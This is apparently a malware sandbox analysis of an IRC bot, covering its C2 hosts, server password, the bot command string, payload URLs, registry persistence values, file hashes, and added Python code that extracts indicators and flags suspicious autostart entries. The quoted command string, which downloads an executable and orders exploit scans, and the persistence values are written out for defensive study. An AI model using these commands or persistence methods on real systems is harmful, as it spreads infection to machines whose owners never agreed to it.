98.126.44.98 (Botnet C2 hosted with kryptservers.com, USA, California)

US hosting is still being used for botnet infrastructure: the IRC command server and all three payload download hosts in this sample sit on US IP space.

Remote Host      Port   Role
208.53.183.219   80     HTTP payload download
208.53.183.73    80     HTTP payload download
208.53.183.92    80     HTTP payload download
98.126.44.98     8100   IRC C2 (ircd); the bot logs in with PASS laorosr

MODE #! -ix
MODE #Ma -ix
USER SP2-650 * 0 :COMPUTERNAME
MODE [N00_USA_XP_9718720]
@ -ix
MODE #dpi -ix

Joins channel #!, which carries the bot's command string (commands separated by "|", including the download of a further payload from 208.53.183.217):
#! :.asc-S|.http http://208.53.183.217/use13.exe|.asc exp_all 30 5 0 -a-r -e|.asc exp_all 30 5 0 -b -r-e|.asc exp_all30 5 0 -b|.asc exp_all 30 5 0 -c|.asc exp_all 30 5 0 -a

nick [N00_USA_XP_4967390]
USER SP2-078 * 0 :COMPUTERNAME
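The beacon above is plain IRC, so the indicators in it (the server password, the nick naming scheme, the channel, and the "|"-separated command string with its download URL) can be pulled out mechanically. The following Python is an added example, not code from the original post or from the bot: it re-types the session lines as a constructed capture with "C>"/"S>" direction markers, assumes the command string is delivered as the channel topic (IRC numeric 332, an assumption; the report only shows the string after the join), and extracts the C2 indicators from it.

```python
import re
from collections import Counter
from urllib.parse import urlparse

# Constructed capture: the session lines reported above, re-typed with "C>" for
# client->server and "S>" for server->client. The command string is assumed to
# arrive as the channel topic (numeric 332); its spacing is kept as reported.
SAMPLE_CAPTURE = """\
C> PASS laorosr
C> NICK [N00_USA_XP_9718720]
C> USER SP2-650 * 0 :COMPUTERNAME
C> MODE [N00_USA_XP_9718720] -ix
C> JOIN #!
S> :ircd 332 [N00_USA_XP_9718720] #! :.asc-S|.http http://208.53.183.217/use13.exe|.asc exp_all 30 5 0 -a-r -e|.asc exp_all 30 5 0 -b -r-e|.asc exp_all30 5 0 -b|.asc exp_all 30 5 0 -c|.asc exp_all 30 5 0 -a
C> MODE #! -ix
"""

# Nick scheme seen in the beacon: [N00_<country>_<OS>_<random id>]
BOT_NICK_RE = re.compile(r"^\[N\d+_([A-Z]{2,3})_([A-Z0-9]+)_(\d+)\]$")
URL_RE = re.compile(r"https?://[^\s|'\"]+")


def parse_bot_nick(nick):
    """Decode a bot nick into its fields, or return None for an ordinary nick."""
    m = BOT_NICK_RE.match(nick)
    if not m:
        return None
    return {"country": m.group(1), "os": m.group(2), "bot_id": m.group(3)}


def parse_irc_line(raw):
    """Minimal RFC 1459 split: optional ':prefix', command, params, ':trailing'."""
    line = raw.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    if " :" in line:
        head, _, trailing = line.partition(" :")
        params = head.split() + [trailing]
    else:
        params = line.split()
    if not params:
        return None
    return {"prefix": prefix, "command": params[0].upper(), "params": params[1:]}


def split_bot_commands(topic):
    """The bot's command string is '|'-separated; drop empty fragments."""
    return [c.strip() for c in topic.split("|") if c.strip()]


def extract_iocs(capture):
    """Walk a direction-marked capture and collect the C2 indicators it exposes."""
    iocs = {"password": None, "bot_nicks": [], "channels": set(),
            "commands": [], "verbs": Counter(), "download_urls": set(),
            "download_hosts": set()}
    for raw in capture.splitlines():
        if raw[1:3] != "> ":          # skip anything without a direction marker
            continue
        msg = parse_irc_line(raw[3:])
        if msg is None:
            continue
        cmd, params = msg["command"], msg["params"]
        if cmd == "PASS" and params:
            iocs["password"] = params[0]
        elif cmd == "NICK" and params and parse_bot_nick(params[0]):
            iocs["bot_nicks"].append(params[0])
        elif cmd == "JOIN" and params:
            iocs["channels"].update(params[0].split(","))
        elif cmd in ("332", "TOPIC") and len(params) >= 2:
            # 332 <nick> <channel> :<topic>  /  TOPIC <channel> :<topic>
            channel, topic = params[-2], params[-1]
            iocs["channels"].add(channel)
            for command in split_bot_commands(topic):
                iocs["commands"].append(command)
                iocs["verbs"][command.split()[0]] += 1
                for url in URL_RE.findall(command):
                    iocs["download_urls"].add(url)
                    iocs["download_hosts"].add(urlparse(url).hostname)
    return iocs


if __name__ == "__main__":
    found = extract_iocs(SAMPLE_CAPTURE)
    for key, value in found.items():
        print(f"{key}: {value}")
```

Running it on the constructed capture yields the password, one bot nick, the channel #!, seven commands (five ".asc" scan instructions plus the ".http" download and the odd ".asc-S"), and 208.53.183.217 as an extra download host that the sandbox's own HTTP list above does not include. Feeding real C2 traffic through the same parser only needs the direction markers added per line.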

Other details

* The following port was open in the system:

Port   Protocol   Process
1057   TCP        cfdrive32.exe (%Windir%\cfdrive32.exe)

* The data identified by the following URLs was then requested from the remote web server:
o http://208.53.183.219/serv6.exe
o http://208.53.183.73/foxjbewj._
o http://208.53.183.92/usa.exe

Registry Modifications

* The following Registry Keys were created:
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run

* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
+ Microsoft Driver Setup = "%Windir%\cfdrive32.exe"

so that cfdrive32.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+ Microsoft Driver Setup = "%Windir%\cfdrive32.exe"

so that cfdrive32.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
+ Taskman = "%AppData%\oekx.exe"

so that oekx.exe runs every time Windows starts (Winlogon launches the program named in Taskman at logon)
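The three autostart writes above are exactly what a registry export check should flag. Below is an added Python example (not the page's own or the sandbox's tooling) that parses a .reg export and applies three heuristics drawn from this report: a Winlogon\Taskman value present at all, a Run-style value whose image lives under a user-writable profile or temp directory, and an image dropped straight into %Windir% instead of System32. The export text is constructed to mirror the values listed above, with one benign "VendorTray" entry (a hypothetical name) added for contrast.

```python
import re

# Constructed .reg export (not taken from the sandbox run): it mirrors the three
# values listed above and adds one benign, hypothetical "VendorTray" entry.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Driver Setup"="%Windir%\\cfdrive32.exe"
"VendorTray"="\"C:\\Program Files\\Vendor\\tray.exe\" /background"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"Microsoft Driver Setup"="%Windir%\\cfdrive32.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe"
"Taskman"="%AppData%\\oekx.exe"
"""

# "name"="string data" lines; .reg escapes backslashes and quotes with a backslash
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
RUN_KEY_SUFFIXES = ("\\currentversion\\run", "\\currentversion\\runonce",
                    "\\policies\\explorer\\run")
USER_WRITABLE = ("%appdata%", "%localappdata%", "%temp%", "%tmp%", "%userprofile%")
WINDIR_ROOT_EXE = re.compile(r"^(?:%windir%|%systemroot%|[a-z]:\\windows)\\[^\\]+\.exe$")


def unescape_reg(s):
    """Undo the .reg escaping of backslashes and double quotes."""
    return s.replace("\\\\", "\\").replace('\\"', '"')


def parse_reg_export(text):
    """Yield (key, value name, string data) for every quoted value in the export."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = VALUE_RE.match(line)
        if m and key:
            yield key, unescape_reg(m.group(1)), unescape_reg(m.group(2))


def image_path(data):
    """Executable part of a command line: a leading quoted path, else up to '.exe'."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    m = re.match(r"(.*?\.exe)(?:\s|$)", data, re.IGNORECASE)
    return m.group(1) if m else data.split(" ")[0]


def classify_autostart(key, name, data):
    """Return why this value looks like malware persistence, or None if it does not."""
    k = key.lower()
    path = image_path(data).lower()
    if k.endswith("\\windows nt\\currentversion\\winlogon") and name.lower() == "taskman":
        return "Winlogon\\Taskman is absent on a clean system; any value here runs at logon"
    if k.endswith(RUN_KEY_SUFFIXES):
        if path.startswith(USER_WRITABLE):
            return "autostart image lives in a user-writable profile or temp directory"
        if WINDIR_ROOT_EXE.match(path):
            return "autostart image dropped directly into %Windir% rather than System32"
        if k.endswith("\\policies\\explorer\\run"):
            return "policies\\Explorer\\Run is a Group Policy location ordinary installers do not use"
    return None


def find_persistence(text):
    """Run the heuristics over a .reg export and return the suspicious entries."""
    findings = []
    for key, name, data in parse_reg_export(text):
        reason = classify_autostart(key, name, data)
        if reason:
            findings.append({"key": key, "name": name,
                             "image": image_path(data), "reason": reason})
    return findings


if __name__ == "__main__":
    for f in find_persistence(SAMPLE_REG):
        print(f"{f['key']}\\{f['name']} -> {f['image']}: {f['reason']}")
```

On a live host the export comes from `reg export HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run run.reg` (and the Winlogon and policies keys likewise); the same heuristics apply to the HKCU copies of these keys, which the sandbox did not list here but which the same family uses.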

Memory Modifications

* There were new processes created in the system:

Process Name    Process Filename         Main Module Size
cfdrive32.exe   %Windir%\cfdrive32.exe   339 968 bytes
9188.exe        %Temp%\9188.exe          339 968 bytes

File System Modifications

* The following files were created in the system:

1. %AppData%\oekx.exe
   [file and pathname of the sample #1]
   Size:  98 304 bytes
   MD5:   0x2FDB85B02FE089750F7F3B7183279012
   SHA-1: 0xEF5BFE39F0E410E88D8171EE9BCB11578F29645D
   Alias: W32/Rimecud.gen.l [McAfee]

2. %Temp%\474.exe
   Size:  2 182 bytes
   MD5:   0xE193D9CE690D7FCD592FF6B92357783F
   SHA-1: 0xA6FA1E134460D33E5DA411534C0969EBB99475B3
   Alias: (not available)

3. %Temp%\614988.exe
   Size:  36 864 bytes
   MD5:   0xACF1E44740A7533C1C5A262D447FBCF2
   SHA-1: 0x33D289CD1A03CA6449CF5D9E131784F2EAE9407C
   Alias: VirTool:Win32/Injector.T [Microsoft], Virus.Win32.Injector [Ikarus]

4. %Temp%\9188.exe
   %Windir%\cfdrive32.exe
   Size:  167 936 bytes
   MD5:   0x6592DB13E7E8AD89991429A0CC6D5CEA
   SHA-1: 0xB170F75E1428F8D2178D6883429FF5932B81344C
   Alias: W32/Rimecud.gen.m [McAfee], Virus.Win32.Vitro [Ikarus]

5. %Windir%\Temp\scs1.tmp
   Size:  2 686 bytes
   MD5:   0x4A587187D760161311010B03417B3C3F
   SHA-1: 0x863BBF5F7F4114A1307C6BAD5DD89224D511FED5
   Alias: (not available)

More info about the hosters here:
http://whois.domaintools.com/98.126.44.98
http://whois.domaintools.com/208.53.183.219
